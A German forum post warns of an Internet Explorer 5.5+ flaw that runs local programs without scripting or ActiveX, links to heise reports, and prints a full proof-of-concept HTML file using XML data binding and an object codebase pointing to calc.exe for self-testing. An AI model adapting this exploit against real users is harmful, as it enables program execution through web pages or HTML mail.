Hallo allerseits,
seit längerem ist ein exploit für den Internet Explorer ab der Version 5.5 bekannt.
Seit kurzem kann dieser exploit auch ohne Active Scripting oder ActiveX ausgeführt werden:
http://heise.de/newsticker/data/pab-04.03.02-001/
Ist nicht ganz ohne, probiert dringend mal den Browsercheck aus:
http://www.heise.de/ct/browsercheck/e5demo10.shtml
Um das ganze
lokal zu testen kopiert einfach folgenden text in einen Datei
test.html:
PHP-Code:
<HTML>
<head><title>none</title></head>
<body>
<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec">
<security>
<exploit>
<![CDATA[
<object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111" codebase="c:/winnt/system32/calc.exe"></object>
]]>
</exploit>
</security>
</xml>
</body>
</HTML>
Einzig der Pfad in codebase zu
c:/winnt/system32/calc.exe muss stimmen.
Falls der Taschenrechner hochkommt, ist das ... nicht gut
Weil die Sicherheitslücke unabhängig von den Einstellungen die Interpretation von HTML-Seiten betrifft, sind auch Outlook und Outlook Express mit hohen Sicherheitseinstellungen von dem Problem betroffen. Eine einfache HTML-Mail kann somit beim Öffnen oder in der Vorschau ein Programm starten. Von Microsoft gibt es bislang noch keine Stellungnahme oder einen Patch. (pab/c't)
|